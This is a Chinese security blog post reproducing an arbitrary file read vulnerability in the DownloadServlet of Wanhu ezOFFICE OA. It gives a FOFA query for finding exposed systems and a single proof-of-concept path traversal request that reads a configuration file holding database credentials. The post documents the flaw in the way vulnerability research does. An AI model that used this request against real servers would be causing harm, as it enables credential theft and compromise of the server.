首页未分类正文

漏洞复现 || 万户OA DownloadServlet 任意文件读取漏洞

2023-04-24 11:31 未分类阅读 9.89k 正在检查是否收录

漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OA DownloadServlet处存在任意文件读取漏洞，攻击者通过漏洞可以读取服务器任意文件，导致服务器失陷。

资产确定
fofa：app="万户网络-ezOFFICE"

漏洞复现

1.执行POC读取配置文件，得到数据库账户密码

/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2

版权所有：多维者博客
文章标题：漏洞复现 || 万户OA DownloadServlet 任意文件读取漏洞
除非注明，文章均为多维者博客原创，请勿用于任何商业用途，转载请注明作者和出处多维者博客

收藏

声明：本站所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。转载请注明来自多维者博客！

漏洞复现 || Metabase 存在任意文件读取

« 上一篇 2023-05-06

漏洞复现 || Apache ShenYu Admin plugin 未授权访问

下一篇 » 2023-04-24

相关文章

发表评论

还没有评论，告诉我们你的想法